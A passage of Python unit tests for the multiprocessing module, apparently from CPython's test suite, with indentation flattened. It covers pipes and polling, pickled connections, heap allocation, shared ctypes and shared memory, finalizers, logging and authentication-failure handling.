p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating Shared Memory Segment with -ve size
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching Shared Memory Segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test if shared memory segment is created properly,
# when _make_filename returns an existing shared memory segment name
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
# Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
# because some POSIX compliant systems require name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
sms = shared_memory.SharedMemory('test02_tsmap', True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
# maintain its connection with the current process, and success when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertTrue(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# killing abruptly processes holding reference to a shared memory
# segment should not leak the given memory segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
